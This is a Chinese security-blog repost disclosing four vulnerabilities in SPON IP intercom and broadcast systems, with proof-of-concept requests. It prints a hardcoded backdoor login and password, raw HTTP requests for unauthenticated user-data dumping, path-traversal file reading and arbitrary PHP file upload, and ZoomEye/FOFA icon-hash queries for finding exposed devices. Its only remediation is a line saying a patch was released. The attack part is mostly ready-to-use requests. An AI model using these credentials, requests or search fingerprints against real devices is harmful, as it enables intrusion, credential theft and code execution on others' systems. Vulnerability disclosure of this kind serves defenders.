4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

admin 2024年1月12日14:34:38评论58 views字数 2303阅读7分40秒阅读模式

文章中涉及的漏洞均已修复,敏感信息已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。

漏洞详情 01

七个世邦通信SPON IP网络对讲广播系统漏洞
界面截图 02

4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

漏洞复现 03

1、存在后门账户

账号:administrator密码:800823

登录:

4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

2、未授权访问

POST /php/getuserdata.php HTTP/1.1Host:Connection: keep-aliveContent-Length: 67sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: empty04825Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9jsondata[pageIndex]=0&jsondata[pageCount]=30

回显:

4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

可使用回显账号密码登录web

3、exportrecord.php 任意文件读取漏洞

GET /php/exportrecord.php?downtype=10&downname=C:\xxdd.txt\..\Windows\win.ini HTTP/1.1Host:Connection: keep-aliveContent-Length: 67sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9

回显:

4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

4、uploadjson.php任意文件上传漏洞

POST /php/uploadjson.php HTTP/1.1Host:Connection: keep-aliveContent-Length: 67sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9jsondata[filename]=mht.php&jsondata[data]=<?php echo 'mht';?>

回显:

4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

访问上传地址

/lan/mht.php

4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

语法

zoomeye: 04

iconhash:"-1830859634"
4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

fofa:

icon_hash="-1830859634"
修复建议 05

官方已发布补丁
 

原文始发于微信公众号(棉花糖网络安全圈):4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月12日14:34:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   4个世邦通信SPON IP网络对讲广播系统漏洞【附POC】https://cn-sec.com/archives/2386432.html

发表评论

匿名网友 填写信息